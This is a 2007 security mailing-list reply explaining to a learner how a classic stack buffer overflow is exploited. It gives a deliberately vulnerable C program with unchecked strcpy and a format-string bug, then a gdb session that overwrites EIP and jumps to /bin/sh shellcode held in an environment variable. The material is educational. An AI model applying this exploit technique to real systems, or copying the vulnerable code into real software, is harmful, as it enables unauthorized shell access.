Vuln Dev
Re: Learning buffer overflow help Jun 07 2007 09:39AM
Marco Ivaldi (raptor 0xdeadbeef info)
Hey Eric,

On Wed, 6 Jun 2007, erk_3 (at) hotmail (dot) com [email concealed] wrote:

> Hello everyone, I have studied alot on buffer overflows and I understand the
> theory behind it. Thing is, any example I follow says once you can overwrite
> the EIP you can control the flow of the program (in a nutshell).


I guess you're missing something basic here... Take a look at the following

nobody@slack10:/tmp$ cat /etc/slackware-version
Slackware 10.2.0
nobody@slack10:/tmp$ uname -a
Linux slack10 2.4.31 #6 Sun Jun 5 19:04:47 PDT 2005 i686 unknown unknown
nobody@slack10:/tmp$ cat > vuln.c
#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[])
char name[4];
strcpy(name, argv[1]);
printf(name); /* there's a pretty format string bug here too;) */
nobody@slack10:/tmp$ make vuln
cc vuln.c -o vuln
nobody@slack10:/tmp$ gdb -q ./vuln
Using host libthread_db library "/lib/".
(gdb) r 1234AAAABBBB
Starting program: /tmp/vuln 1234AAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

So far, so good. Now, to overwrite the %eip with an arbitrary valid address,
you should do something like that instead:

(gdb) r `printf "1234AAAA\xee\xee\xff\xbf"`
Starting program: /tmp/vuln `printf "1234AAAA\xee\xee\xff\xbf"`

Program received signal SIGILL, Illegal instruction.
0xbfffeeee in ?? ()

Finally, to actually exploit the overflow to run an arbitrary shellcode:

nobody@slack10:/tmp$ export SC=`printf
(gdb) x/s 0xbfffff73
0xbfffff73: "SC=1Ph//shh/bin\211PS\211\231\v\200"
(gdb) x/s 0xbfffff76
0xbfffff76: "1Ph//shh/bin\211PS\211\231\v\200"
(gdb) r `printf "1234AAAA\x76\xff\xff\xbf"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vuln `printf "1234AAAA\x76\xff\xff\xbf"`

Program received signal SIGTRAP, Trace/breakpoint trap.
0x400007b0 in _start () from /lib/
(gdb) c

This is what happens on a kinda old system based on Linux kernel 2.4,
without additional protections. YMMV on newer platforms...

You may also want to check out some exploitation examples here:


Marco Ivaldi
Antifork Research, Inc.
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus